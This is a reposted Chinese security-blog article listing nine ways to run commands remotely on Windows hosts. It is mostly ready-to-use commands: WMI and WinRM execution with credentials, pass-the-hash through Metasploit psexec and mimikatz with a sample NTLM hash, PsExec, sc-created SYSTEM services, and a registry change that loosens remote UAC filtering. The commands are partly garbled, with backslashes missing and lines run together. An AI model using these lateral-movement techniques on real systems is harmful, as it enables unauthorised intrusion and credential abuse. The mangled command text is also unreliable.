Windows远程命令执行cmd命令的9种方法

  • A+
所属分类:安全文章

一、远程执行命令方式及对应端口:

IPC$+AT 445PSEXEC 445WMI 135Winrm 5985(HTTP)&5986(HTTPS)


二、9种远程执行cmd命令的方法:

1.WMI执行命令方式,无回显:

wmic /node:192.168.1.158 /user:pt007 /password:admin123  process call create "cmd.exe /c ipconfig>d:result.txt"

2.使用Hash直接登录Windows(HASH传递)

抓取windows hash值,得到administrator的hash: 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf调用payload:use exploit/windows/smb/psexec show optionsset RHOST 192.168.81.129set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFset SMBUser Administratorshow optionsrun

3. mimikatz传递hash方式连接+at计划任务执行命令:

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //传递hashdir \192.168.1.185c$

4.WMIcmd执行命令,有回显:

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"

程序下载地址: https://github.com/nccgroup/WMIcmd/releases


5.Cobalt strkie远程执行命令与hash传递攻击

Windows远程命令执行cmd命令的9种方法


6.psexec.exe远程执行命令

psexec /accepteula //接受许可协议sc delete psexesvcpsexec \192.168.1.185 -u pt007 -p admin123 cmd.exe

7.psexec.vbs远程执行命令

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"

8.winrm远程执行命令

//肉机上面快速启动winrm服务,并绑定到5985端口:winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts="*"}netstat -ano|find "5985"
//客户端连接方式:winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd
//UAC问题,修改后,普通管理员登录后也是高权限:reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fwinrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

9.远程命令执行sc

//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):

net use \192.168.17.138c$ "admin123" /user:pt007net usedir \192.168.17.138c$copy test.exe \192.168.17.138c$sc \192.168.17.138 create test binpath= "c:test.exe"sc \192.168.17.138 start testsc \192.168.17.138 del test

作者:pt007    转载于:先知社区    原文链接:https://xz.aliyun.com/t/5957


觉得有用的话,帮忙点个关注,谢谢啦。


本文始发于微信公众号(Top security):Windows远程命令执行cmd命令的9种方法

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: